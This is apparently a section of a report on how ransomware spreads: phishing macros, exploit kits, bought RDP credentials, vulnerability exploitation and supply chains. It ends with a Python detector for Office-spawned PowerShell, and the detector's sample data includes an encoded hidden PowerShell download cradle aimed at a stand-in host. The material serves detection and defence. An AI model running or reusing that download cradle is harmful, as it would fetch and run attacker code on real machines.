**3. Distribution methods**

Ransomware is spread through multiple distribution methods. These are as follows:

Phishing—The most common attack vector used by attackers, as shown in **Figure 4**. Attackers send an email designed to lure the victim into opening a weaponized Office attachment. When the user opens the attachment (Word or Excel) and enables macros, a malicious program runs a PowerShell command that downloads second-stage malware from the command and control (C2) server. Additional payloads are downloaded for lateral movement, and once control is gained over the Active Directory (AD) domain, the attacker downloads ransomware as a final payload and deploys it to multiple devices.

**Figure 4.** *Attack vector phishing.*

Exploit kits—An exploit kit is a toolkit designed to exploit vulnerabilities on a victim's system during web browsing. When a user visits a compromised website, the victim is redirected to another landing page. The victim's machine is scanned for browser-based vulnerabilities and malware is downloaded. Ransomware groups employ malvertising to redirect users to the attacker's website, where an exploit is executed that leads to the eventual deployment of ransomware (**Figure 5**).

**Figure 5.** *Attack vector exploit kit.*

Buying credentials from access brokers—Attackers buy credentials from initial access brokers (IABs) to gain initial access. Remote Desktop Protocol (RDP) credentials are the most common type used to achieve a foothold.

Exploiting vulnerabilities—Ransomware operators also gain initial access by exploiting vulnerabilities in Internet-facing applications.

Third-party vendors—The supply chain has become the latest attack vector leading to ransomware deployment.
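The phishing chain described above (an Office document whose macro launches PowerShell to fetch a second stage) leaves a recognizable parent/child process pattern that defenders can detect. The following is an added example, not part of the original text. It assumes process-creation events are available as dictionaries with Sysmon-style `ParentImage`, `Image` and `CommandLine` fields; the sample events, the rule labels and the host name are constructed.

```python
import base64
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE_PARENTS = {"winword.exe", "excel.exe"}  # "Word or Excel" per the text
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
DOWNLOAD_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer",
    re.I)
# PowerShell accepts abbreviated forms of -EncodedCommand such as -enc and -e.
ENCODED_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or not UTF-16LE: treat as not decodable
        return ""

def classify(event):
    """Label a process-creation event; None means the parent/child pair is not of interest."""
    parent = basename(event["ParentImage"]).lower()
    child = basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    text = event["CommandLine"] + " " + decode_encoded_command(event["CommandLine"])
    if DOWNLOAD_HINTS.search(text):
        return "office-spawned-downloader"
    return "office-spawned-script-host"

def _enc(script):  # helper that builds the constructed sample below
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed events, not real telemetry
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS, "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc(
         "(New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/')")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), "<-", ev["CommandLine"][:60])
```

Decoding the `-EncodedCommand` argument before matching matters because the download call is otherwise hidden inside base64 and a plain string match on the command line misses it.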
